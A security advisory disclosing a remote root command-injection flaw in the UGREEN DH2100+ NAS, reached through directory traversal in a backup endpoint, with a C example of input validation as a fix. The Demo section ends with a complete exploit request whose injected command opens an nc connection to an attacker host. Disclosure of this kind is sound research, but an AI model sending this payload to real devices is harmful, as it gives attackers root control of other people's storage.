Information

Vendor: UGREEN (https://www.ugnas.com/)

Affected Product: DH2100+ NAS ≤ V5.3.0.251125

Reporter: Jincheng Wang (@winmt, wjcwinmt@gmail.com)

Description

A remote command execution vulnerability exists in the UGREEN DH2100+ NAS device. This vulnerability arises from a combination of arbitrary directory creation and command injection vulnerabilities. An attacker can send a specially crafted message to the /v1/file/backup/create endpoint, creating a uuid directory through directory traversal in the path field, and injecting malicious commands into the directory name (i.e., uuid name), thereby gaining ROOT control of the remote target NAS device.

Details

In the binary file /data/nas_server/nas_svr, within the handler_file_backup_create function corresponding to the /v1/file/backup/create endpoint, the path field is retrieved and stored in v37.

Next, the path field is appended to the base path to form the complete target path.

Then, if the path is detected as non-existent, the create_path function is called to create this directory.

Clearly, there is a directory traversal vulnerability here: the unsanitized path field allows the creation of an arbitrary directory under any path.

The /mnt/media_rw directory stores the uuids (disk numbers) of the RAID disks. The NAS system continuously monitors disk status; if it detects that the disk corresponding to a certain uuid is missing (i.e., removed), it broadcasts a command in which that uuid is embedded (captured in a screenshot in the original report).

Therefore, a directory with a name containing arbitrary malicious commands can be created under /mnt/media_rw as a uuid. The disk corresponding to this uuid obviously does not exist, so the command here will be triggered immediately, thereby completing command injection, executing arbitrary commands on the remote target NAS device, and gaining the highest ROOT privilege.
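The two missing checks described above, as an added example written for this advisory (not code from the vendor's nas_svr binary): a strict uuid validator, so that a directory name under /mnt/media_rw can never carry shell metacharacters into the broadcast command, and a lexical containment check for the path field that rejects absolute paths and any ".." component before the directory is created. The base directory and function names are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define UUID_LEN 36

/* Accept only the canonical 8-4-4-4-12 hex layout; anything else
 * (quotes, '$', '(', spaces) is rejected before it can reach a shell. */
bool is_valid_uuid(const char *s) {
    if (s == NULL || strlen(s) != UUID_LEN) return false;
    for (int i = 0; i < UUID_LEN; i++) {
        bool dash = (i == 8 || i == 13 || i == 18 || i == 23);
        if (dash ? s[i] != '-' : !isxdigit((unsigned char)s[i])) return false;
    }
    return true;
}

/* Join a user-supplied relative path onto a fixed base. Returns true and
 * writes the result to out only when no component can escape the base.
 * The target may not exist yet, so the check is lexical, not realpath(). */
bool safe_backup_path(const char *base, const char *path, char *out, size_t outlen) {
    if (path == NULL || path[0] == '\0' || path[0] == '/') return false;
    if (strchr(path, '\\') != NULL) return false;   /* no alternate separators */
    const char *p = path;
    while (*p) {
        const char *end = strchr(p, '/');
        size_t n = end ? (size_t)(end - p) : strlen(p);
        if (n == 0) return false;                  /* empty component ("//") */
        if (n == 2 && p[0] == '.' && p[1] == '.') return false; /* traversal */
        p += n;
        if (*p == '/') p++;
    }
    int w = snprintf(out, outlen, "%s/%s", base, path);
    return w > 0 && (size_t)w < outlen;
}

int main(void) {
    char out[256];
    const char *base = "/mnt/storage/backup";      /* assumed base directory */
    /* Constructed inputs mirroring the shapes discussed in the advisory. */
    printf("traversal rejected: %d\n",
           !safe_backup_path(base, "../../../../../../../mnt/media_rw/x", out, sizeof out));
    printf("normal path accepted: %d\n", safe_backup_path(base, "photos/2024", out, sizeof out));
    printf("real uuid accepted: %d\n", is_valid_uuid("4b7987d4-a92b-41bf-9fc2-d18b03023cff"));
    printf("metacharacters rejected: %d\n", !is_valid_uuid("4b7987d4-a92b-41bf-9fc2-$(id)23cff00"));
    return 0;
}
```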

Demo

An attacker can send the following request to a remote target NAS device.

http://xxx:9999/v1/file/backup/create?api_token=ZmQwMTA4MjA4MzlmZWY2MTMzZTZhZmYxNmRiNjFlMTgxMDBhZmFlMw%3D%3D&uuid=4b7987d4-a92b-41bf-9fc2-d18b03023cff&id=hacker&alias=winmt&path=../../../../../../../mnt/media_rw/'$>(nc 192.168.31.167 8888)'